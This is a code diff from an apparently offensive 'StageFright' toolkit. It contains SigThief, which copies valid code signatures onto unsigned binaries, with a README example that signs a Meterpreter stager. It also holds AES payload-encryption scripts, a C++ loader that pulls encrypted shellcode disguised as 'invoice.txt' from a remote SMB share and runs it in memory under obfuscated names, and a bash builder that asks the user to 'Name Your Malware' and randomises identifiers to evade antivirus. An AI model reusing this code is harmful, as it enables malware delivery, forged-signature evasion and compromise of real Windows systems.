+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

StageFright/StageFright/StageFright/Resources/SigThief/README.md

@@ -0,0 +1,93 @@
+# SigThief
+
+New version available to Dev-tier sponsors: https://github.com/sponsors/secretsquirrel
+
+Stable tier will have it End of Month August 2021
+
+---
+Stealing Signatures and Making One Invalid Signature at a Time (Unless you read this:
+https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf)
+
+https://twitter.com/subTee/status/912769644473098240
+![alt text](https://i.imgur.com/T05kwwn.png "https://twitter.com/subTee/status/912769644473098240")
+
+## For security professionals only...
+
+## What is this?
+
+I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.
+
+So I'm releasing this tool to let you quickly do your testing and feel free to report it to vendors or not. 
+
+In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file. 
+
+Of course it's **not a valid signature** and that's the point!
+
+I look forward to hearing about your results!
+
+
+## How to use
+
+### Usage
+```
+Usage: sigthief.py [options]
+
+Options:
+  -h, --help            show this help message and exit
+  -i FILE, --file=FILE  input file
+  -r, --rip             rip signature off inputfile
+  -a, --add             add signautre to targetfile
+  -o OUTPUTFILE, --output=OUTPUTFILE
+                        output file
+  -s SIGFILE, --sig=SIGFILE
+                        binary signature from disk
+  -t TARGETFILE, --target=TARGETFILE
+                        file to append signature too
+  -c, --checksig        file to check if signed; does not verify signature
+  -T, --truncate        truncate signature (i.e. remove sig)
+```
+
+### Take a Signature from a binary and add it to another binary
+```
+$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
+Output file: /tmp/msftesting_tcpview.exe
+Signature appended. 
+FIN.
+```
+
+### Save Signature to disk for use later
+```
+$ ./sigthief.py -i tcpview.exe -r                                                        
+Ripping signature to file!
+Output file: tcpview.exe_sig
+Signature ripped. 
+FIN.
+
+```
+
+### Use the ripped signature
+```
+$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
+Output file: x86_meterpreter_stager.exe_signed
+Signature appended. 
+FIN.
+
+```
+
+### Truncate (remove) signature
+This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)
+
+```
+$ ./sigthief.py -i tcpview.exe -T    
+Inputfile is signed!
+Output file: tcpview.exe_nosig
+Overwriting certificate table pointer and truncating binary
+Signature removed. 
+FIN.
+```
+
+### Check if there is a signature (does not check validity)
+```
+$ ./sigthief.py -i tcpview.exe -c
+Inputfile is signed!
+```

StageFright/StageFright/StageFright/Resources/SigThief/sigthief.py

@@ -0,0 +1,269 @@
+#!/usr/bin/env python3
+# LICENSE: BSD-3
+# Copyright: Josh Pitts @midnite_runr
+
+import sys
+import struct
+import shutil
+import io
+from optparse import OptionParser
+
+
+def gather_file_info_win(binary):
+        """
+        Borrowed from BDF...
+        I could just skip to certLOC... *shrug*
+        """
+        flItms = {}
+        binary = open(binary, 'rb')
+        binary.seek(int('3C', 16))
+        flItms['buffer'] = 0
+        flItms['JMPtoCodeAddress'] = 0
+        flItms['dis_frm_pehdrs_sectble'] = 248
+        flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
+        # Start of COFF
+        flItms['COFF_Start'] = flItms['pe_header_location'] + 4
+        binary.seek(flItms['COFF_Start'])
+        flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
+        binary.seek(flItms['COFF_Start'] + 2, 0)
+        flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
+        binary.seek(flItms['COFF_Start'] + 16, 0)
+        flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
+        #End of COFF
+        flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
+
+        #if flItms['SizeOfOptionalHeader']:
+            #Begin Standard Fields section of Optional Header
+        binary.seek(flItms['OptionalHeader_start'])
+        flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
+        flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
+        flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['SizeOfUninitializedData'] = struct.unpack("<I",
+                                                               binary.read(4))[0]
+        flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
+        flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
+        if flItms['Magic'] != 0x20B:
+            flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
+        # End Standard Fields section of Optional Header
+        # Begin Windows-Specific Fields of Optional Header
+        if flItms['Magic'] == 0x20B:
+            flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
+        else:
+            flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
+                                                                   binary.read(2))[0]
+        flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
+                                                                   binary.read(2))[0]
+        flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SizeOfImageLoc'] = binary.tell()
+        flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
+        flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
+        if flItms['Magic'] == 0x20B:
+            flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
+            flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
+
+        else:
+            flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
+            flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
+        flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
+        # End Windows-Specific Fields of Optional Header
+        # Begin Data Directories of Optional Header
+        flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
+        #ImportTable SIZE|LOC
+        flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
+        flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
+        flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
+        flItms['CertTableLOC'] = binary.tell()
+        flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
+        flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
+        binary.close()
+        return flItms
+
+
+def copyCert(exe):
+    flItms = gather_file_info_win(exe)
+
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Input file Not signed!")
+        sys.exit(-1)
+
+    with open(exe, 'rb') as f:
+        f.seek(flItms['CertLOC'], 0)
+        cert = f.read(flItms['CertSize'])
+    return cert
+
+
+def writeCert(cert, exe, output):
+    flItms = gather_file_info_win(exe)
+    
+    if not output: 
+        output = output = str(exe) + "_signed"
+
+    shutil.copy2(exe, output)
+    
+    print("Output file: {0}".format(output))
+
+    with open(exe, 'rb') as g:
+        with open(output, 'wb') as f:
+            f.write(g.read())
+            f.seek(0)
+            f.seek(flItms['CertTableLOC'], 0)
+            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
+            f.write(struct.pack("<I", len(cert)))
+            f.seek(0, io.SEEK_END)
+            f.write(cert)
+
+    print("Signature appended. \nFIN.")
+
+
+def outputCert(exe, output):
+    cert = copyCert(exe)
+    if not output:
+        output = str(exe) + "_sig"
+
+    print("Output file: {0}".format(output))
+
+    open(output, 'wb').write(cert)
+
+    print("Signature ripped. \nFIN.")
+
+
+def check_sig(exe):
+    flItms = gather_file_info_win(exe)
+ 
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Inputfile Not signed!")
+    else:
+        print("Inputfile is signed!")
+
+
+def truncate(exe, output):
+    flItms = gather_file_info_win(exe)
+ 
+    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
+        # not signed
+        print("Inputfile Not signed!")
+        sys.exit(-1)
+    else:
+        print( "Inputfile is signed!")
+
+    if not output:
+        output = str(exe) + "_nosig"
+
+    print("Output file: {0}".format(output))
+
+    shutil.copy2(exe, output)
+
+    with open(output, "r+b") as binary:
+        print('Overwriting certificate table pointer and truncating binary')
+        binary.seek(-flItms['CertSize'], io.SEEK_END)
+        binary.truncate()
+        binary.seek(flItms['CertTableLOC'], 0)
+        binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
+
+    print("Signature removed. \nFIN.")
+
+
+def signfile(exe, sigfile, output):
+    flItms = gather_file_info_win(exe)
+    
+    cert = open(sigfile, 'rb').read()
+
+    if not output: 
+        output = output = str(exe) + "_signed"
+
+    shutil.copy2(exe, output)
+    
+    print("Output file: {0}".format(output))
+    
+    with open(exe, 'rb') as g:
+        with open(output, 'wb') as f:
+            f.write(g.read())
+            f.seek(0)
+            f.seek(flItms['CertTableLOC'], 0)
+            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
+            f.write(struct.pack("<I", len(cert)))
+            f.seek(0, io.SEEK_END)
+            f.write(cert)
+    print("Signature appended. \nFIN.")
+
+
+if __name__ == "__main__":
+    usage = 'usage: %prog [options]'
+    print("\n\n!! New Version available now for Dev Tier Sponsors! Sponsor here: https://github.com/sponsors/secretsquirrel\n\n")
+    parser = OptionParser()
+    parser.add_option("-i", "--file", dest="inputfile", 
+                  help="input file", metavar="FILE")
+    parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
+                  help='rip signature off inputfile')
+    parser.add_option('-a', '--add', dest='addsig', action='store_true',
+                  help='add signautre to targetfile')
+    parser.add_option('-o', '--output', dest='outputfile',
+                  help='output file')
+    parser.add_option('-s', '--sig', dest='sigfile',
+                  help='binary signature from disk')
+    parser.add_option('-t', '--target', dest='targetfile',
+                  help='file to append signature to')
+    parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
+                  help='file to check if signed; does not verify signature')
+    parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
+                  help='truncate signature (i.e. remove sig)')
+    (options, args) = parser.parse_args()
+    
+    # rip signature
+    # inputfile and rip to outputfile
+    if options.inputfile and options.ripsig:
+        print("Ripping signature to file!")
+        outputCert(options.inputfile, options.outputfile)
+        sys.exit()    
+
+    # copy from one to another
+    # inputfile and rip to targetfile to outputfile    
+    if options.inputfile and options.targetfile:
+        cert = copyCert(options.inputfile)
+        writeCert(cert, options.targetfile, options.outputfile)
+        sys.exit()
+
+    # check signature
+    # inputfile 
+    if options.inputfile and options.checksig:
+        check_sig(options.inputfile) 
+        sys.exit()
+
+    # add sig to target file
+    if options.targetfile and options.sigfile:
+        signfile(options.targetfile, options.sigfile, options.outputfile)
+        sys.exit()
+        
+    # truncate
+    if options.inputfile and options.truncate:
+        truncate(options.inputfile, options.outputfile)
+        sys.exit()
+
+    parser.print_help()
+    parser.error("You must do something!")
+

StageFright/StageFright/StageFright/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/SMB/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

StageFright/StageFright/StageFright/SMB/Resources/template.cpp

@@ -0,0 +1,252 @@
+#include <windows.h>
+#include <winternl.h>
+#include <wchar.h>
+#include <winternl.h>
+#include <winbase.h>
+#include <winnt.h>
+#include <fileapi.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tlhelp32.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+
+#ifndef NTSTATUS
+typedef LONG NTSTATUS;
+#endif
+
+#ifndef NT_SUCCESS
+#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
+#endif
+
+typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect);
+
+typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType);
+
+typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect);
+
+typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
+    OUT PHANDLE ThreadHandle,
+    IN ACCESS_MASK DesiredAccess,
+    IN LPVOID ObjectAttributes,
+    IN HANDLE ProcessHandle,
+    IN LPTHREAD_START_ROUTINE StartAddress,
+    IN LPVOID Parameter,
+    IN BOOL CreateSuspended,
+    IN ULONG StackZeroBits,
+    IN ULONG SizeOfStackCommit,
+    IN ULONG SizeOfStackReserve,
+    OUT LPVOID BytesBuffer);
+
+typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
+    HANDLE ObjectHandle,
+    BOOLEAN Alertable,
+    PLARGE_INTEGER Timeout);
+
+typedef NTSTATUS(WINAPI* _NtClose)(
+    HANDLE Handle);
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter);
+
+void PrintError(const wchar_t* action) {}
+
+BOOL KcylyuBhvyVr(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
+    BOOL operationSuccess = TRUE;
+    PBYTE allocatedMemory = NULL;
+
+    WCHAR szFullUNCPath[MAX_PATH];
+    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
+
+    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if (hFile == INVALID_HANDLE_VALUE) {
+        operationSuccess = FALSE;
+    }
+    else {
+        DWORD fileSize = GetFileSize(hFile, NULL);
+        if (fileSize == INVALID_FILE_SIZE) {
+            operationSuccess = FALSE;
+        }
+        else {
+            SIZE_T allocationSize = fileSize;
+
+            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
+            NTSTATUS status = pNtAllocateVirtualMemory(
+                GetCurrentProcess(),
+                (PVOID*)&allocatedMemory,
+                0,
+                &allocationSize,
+                MEM_COMMIT | MEM_RESERVE,
+                PAGE_READWRITE);
+
+            if (!NT_SUCCESS(status)) {
+                operationSuccess = FALSE;
+            }
+            else {
+                DWORD bytesRead;
+                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
+                    operationSuccess = FALSE;
+                }
+
+                *binaryData = allocatedMemory;
+                *binarySize = bytesRead;
+            }
+        }
+
+        CloseHandle(hFile);
+    }
+
+    return operationSuccess;
+}
+
+BOOL RpJFyaApw(const PBYTE BinaryData, SIZE_T DataSize) {
+    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    if (pMemory == NULL) {
+        return FALSE;
+    }
+
+    memcpy(pMemory, BinaryData, DataSize);
+
+    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
+    SIZE_T regionSize = DataSize;
+    ULONG oldProtect;
+    NTSTATUS status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_NOACCESS,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    status = pNtProtectVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        PAGE_EXECUTE_READ,
+        &oldProtect);
+
+    if (!NT_SUCCESS(status)) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
+    if (hThread == NULL) {
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    ULONG suspendCount = ResumeThread(hThread);
+    if (suspendCount == (DWORD)-1) {
+        CloseHandle(hThread);
+        VirtualFree(pMemory, 0, MEM_RELEASE);
+        return FALSE;
+    }
+
+    WaitForSingleObject(hThread, INFINITE);
+
+    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
+    status = pNtClose(hThread);
+
+    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+    status = pNtFreeVirtualMemory(
+        GetCurrentProcess(),
+        &pMemory,
+        &regionSize,
+        MEM_RELEASE);
+
+    return TRUE;
+}
+
+DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
+    PBYTE BinaryData = (PBYTE)lpParameter;
+    typedef void (*FunctionPointer)();
+    FunctionPointer pFunction = (FunctionPointer)BinaryData;
+
+    pFunction();
+
+    return 0;
+}
+
+int ldIxQwjSeJ(char* Random4, unsigned int AATpD, char* oGlDwGz, size_t oGlDwGzlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+    if (!CryptHashData(hHash, (BYTE*)oGlDwGz, (DWORD)oGlDwGzlen, 0)) {
+        return -1;
+    }
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &AATpD)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char HnkJIiAnwFwX[] =  { 0x17, 0xe6, 0x41, 0xce, 0x83, 0xae, 0xde, 0xb0, 0xe4, 0x6e, 0xa8, 0xd3, 0xe7, 0x25, 0xf, 0x3f };
+
+int main() {
+    LPCWSTR szServer = L"win11blue";
+    LPCWSTR szFilePath = L"Shared\\invoice.txt";
+
+    PBYTE ogaJQctJxnqlX;
+    SIZE_T ogaJQctJxnqlXSize;
+
+    BOOL success = KcylyuBhvyVr(szServer, szFilePath, &ogaJQctJxnqlX, &ogaJQctJxnqlXSize);
+
+    if (success) {
+        ldIxQwjSeJ((char*)ogaJQctJxnqlX, ogaJQctJxnqlXSize, HnkJIiAnwFwX, sizeof(HnkJIiAnwFwX));
+
+        success = RpJFyaApw(ogaJQctJxnqlX, ogaJQctJxnqlXSize);
+
+        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
+        SIZE_T regionSize = ogaJQctJxnqlXSize;
+        NTSTATUS status = pNtFreeVirtualMemory(
+            GetCurrentProcess(),
+            (PVOID*)&ogaJQctJxnqlX,
+            &regionSize,
+            MEM_RELEASE);
+
+        LocalFree(ogaJQctJxnqlX);
+    }
+
+    return success ? 0 : 1;
+}
+

StageFright/StageFright/StageFright/SMB/SMB.sh

@@ -0,0 +1,190 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+
+  ___   _____ _____   _____                            _           _ 
+ / _ \ |  ___/  ___| |  ___|                          | |         | |
+/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| |
+|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` |
+| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| |
+\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_|
+                                            __/ | |                  
+                                           |___/|_|                  
+ _____ _                       _   ________  _________               
+/  ___| |                     | | /  ___|  \/  || ___ \              
+\ `--.| |_ __ _  __ _  ___  __| | \ `--.| .  . || |_/ /              
+ `--. \ __/ _` |/ _` |/ _ \/ _` |  `--. \ |\/| || ___ \              
+/\__/ / || (_| | (_| |  __/ (_| | /\__/ / |  | || |_/ /              
+\____/ \__\__,_|\__, |\___|\__,_| \____/\_|  |_/\____/               
+                 __/ |                                               
+                |___/                                                
+ _____                    _   _                                      
+|  ___|                  | | (_)                                     
+| |____  _____  ___ _   _| |_ _  ___  _ __                           
+|  __\ \/ / _ \/ __| | | | __| |/ _ \| '_ \                          
+| |___>  <  __/ (__| |_| | |_| | (_) | | | |                         
+\____/_/\_\___|\___|\__,_|\__|_|\___/|_| |_|                                             
+
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The Hostname Of Your Target? ex: Win11Wkstn"${clear}
+echo ""
+read HOSTNAME
+echo ""
+echo -e ${green}"Enter The Share Name You're Hosting Your Shellcode From'. ex: CorporateShare"${clear}
+echo ""
+read SHAREFOLDER
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/SMB/template.cpp StageFright/SMB/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/SMB/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/SMB/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/SMB/conv.py StageFright/SMB/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/SMB/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/SMB/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/SMB/Resources/con.py
+sed -i "s/;//g" -i StageFright/SMB/Resources/con.py
+python3 StageFright/SMB/Resources/con.py
+#rm StageFright/SMB/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/SMB/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/SHAREFOLDER/$SHAREFOLDER/g" StageFright/SMB/Resources/template.cpp
+sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/SMB/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/SMB/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/SMB/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/SMB/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/SMB/Resources/template.cpp
+
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/SMB/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/SMB/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/SMB/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/SMB/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/SMB/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/SMB/Resources/template.cpp
+
+#Sleep Function
+
